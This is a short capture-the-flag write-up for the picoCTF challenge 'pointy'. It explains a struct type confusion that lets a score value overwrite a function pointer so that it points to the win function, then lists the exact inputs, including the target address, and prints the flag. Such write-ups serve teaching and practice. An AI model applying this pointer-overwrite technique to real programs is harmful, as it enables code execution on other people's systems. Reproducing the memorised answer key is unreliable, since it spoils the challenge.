pointy
Binary Exploitation - Points: 350
Exploit the function pointers in this program.
The struct
s of Professor
and Student
are quite similar, the professor has an int lastScore
and the student a function pointer to the scoreProfessor
function (also 32 bit size). The retrieveProfessor
function does not verify the structure, it even assumes struct Student
, so it is possible to rate a student instead of professor. This makes it possible to modify the function address of the student’s scoreProfessor
function and let it point to the win
function. In the next rating attempt with that student it executes the win
function and prints the flag.
This can be achieved with the following inputs:
Input the name of a student
a
Input the name of the favorite professor of a student
b
Input the name of the student that will give the score
a
Input the name of the professor that will be scored
a
a
Input the score:
134514326
Score Given: 134514326
Input the name of a student
c
Input the name of the favorite professor of a student
d
Input the name of the student that will give the score
a
Input the name of the professor that will be scored
d
d
Input the score:
0
flag: picoCTF{g1v1ng_d1R3Ct10n5_c7465fbf}